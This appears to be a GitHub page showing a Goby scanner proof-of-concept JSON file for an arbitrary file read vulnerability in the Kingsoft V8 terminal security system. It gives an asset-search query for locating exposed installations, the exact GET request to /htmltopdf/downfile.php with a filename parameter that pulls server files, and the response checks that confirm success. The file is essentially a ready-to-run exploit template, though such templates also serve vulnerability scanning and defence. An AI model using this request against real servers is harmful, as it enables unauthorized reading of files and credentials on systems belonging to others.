-
Notifications
You must be signed in to change notification settings - Fork 8
/
Kingsoft_V8_Arbitrary_file_read.json
51 lines (51 loc) · 1.98 KB
/
Kingsoft_V8_Arbitrary_file_read.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
{
"Name": "Kingsoft V8 Arbitrary file read",
"Level": "1",
"Tags": [],
"GobyQuery": "app=\"kingsoft-V8+-Terminal-security-system\"",
"Description": "There is an arbitrary file reading vulnerability in Jinshan V8 terminal security system, through which attackers can download arbitrary files from the server",
"Product": "Kingsoft V8",
"Homepage": "https://www.ejinshan.net/",
"Author": "PeiQi",
"Impact": "<p>through which attackers can download arbitrary files from the server<br></p>",
"Recommandation": "",
"References": [
"http://wiki.peiqi.tech"
],
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/htmltopdf/downfile.php?filename=downfile.php",
"follow_redirect": false,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "$filename",
"bz": ""
}
]
},
"SetVariable": []
}
],
"PostTime": "2021-04-21 21:13:15",
"GobyVersion": "1.8.258"
}